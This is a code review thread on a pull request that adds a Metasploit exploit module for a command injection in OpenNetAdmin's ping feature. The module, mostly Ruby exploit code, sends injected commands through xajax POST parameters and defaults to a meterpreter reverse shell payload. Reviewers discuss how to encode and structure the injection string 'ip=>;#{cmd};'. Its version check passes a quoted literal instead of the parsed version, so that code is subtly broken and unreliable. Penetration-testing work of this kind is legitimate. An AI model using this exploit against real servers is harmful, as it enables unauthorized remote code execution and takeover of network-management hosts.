modules/exploits/multi/http/opennetadmin_ping_cmd_injection.rb

```diff
@@ -0,0 +1,104 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'OpenNetAdmin Ping Command Injection',
+      'Description'     => %q{
+        This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.
+      },
+      'Author'          =>
+        [
+          'mattpascoe', # Vulnerability discovery
+          'Onur ER <onur@onurer.net>' # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['EDB', '47691']
+        ],
+      'DisclosureDate'  => '2019-11-19',
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'linux',
+      'Arch'            => [ARCH_X86, ARCH_X64],
+      'Privileged'      => false,
+      'Targets'         =>
+        [
+          ['Automatic Target', {}]
+        ],
+      'DefaultOptions'  =>
+        {
+          'RPORT'   => 80,
+          'payload' => 'linux/x86/meterpreter/reverse_tcp'
+        },
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        OptString.new('VHOST', [false, 'HTTP server virtual host']),
+        OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method'        => 'POST',
+      'uri'           => normalize_uri(target_uri.path),
+      'ctype'         => 'application/x-www-form-urlencoded',
+      'encode_params' => false,
+      'vars_post'     => {
+        'xajax'       => 'window_open',
+        'xajaxargs[]' => 'app_about'
+      }
+     })
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.body =~ /OpenNetAdmin/i
+      return CheckCode::Safe
+    end
+
+    opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\d\.]+)/).flatten.first
+    version = Gem::Version.new('opennetadmin_version')
+
+    if version
+      vprint_status "OpenNetAdmin version #{version}"
+    end
+
+    if version >= Gem::Version.new('8.5.14') && version <= Gem::Version.new('18.1.1')
+      return CheckCode::Appears
+    end
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    print_status('Exploiting...')
+    execute_cmdstager(flavor: :printf)
+  end
+
+  def filter_bad_chars(cmd)
+    cmd.gsub!(/chmod \+x/, 'chmod 777')
```

Comment:
Would this make more sense as:
```suggestion
    CGI.escape cmd
```
to catch all the characters?

Reply:
Is there a reason to use `data` rather than `vars_post` (which would automatically take care of URL encoding) ?

Reply:
```
    vars_post = {
          'xajax'          => 'window_submit',
          'xajaxargs[]' => 'tooltips',
          'xajaxargs[]' => 'ip%3D%3E;#{filter_bad_chars(cmd)};',
          'xajaxargs[]' => 'ping'
        }
```
`warning: key "xajaxargs[]" is duplicated and overwritten`

I am encountering the above error.
@bcoles

Reply:
Unfortunately I don't see a way to handle the repeated key query string paradigm in Rex (PHP will turn it into an array). I'm fine passing as a string (with the payload properly encoded), or you can add array handling to https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client_request.rb#L138-L146. Instead of doing a `val.to_s` right away, when `val` is an array I would do something like:
```ruby
val.each do |v|
  v = v.to_s
  pstr << '&' if pstr.length > 0
  pstr << (opts['encode_params'] ? set_encode_uri(var) : var)
  pstr << '='
  pstr << (opts['encode_params'] ? set_encode_uri(v) : v)
end
```

Then you could pass the post data like:
```ruby
    vars_post = {
          'xajax'          => 'window_submit',
          'xajaxargs[]' => ['tooltips', 'ip=>;#{cmd};', 'ping']
        }
```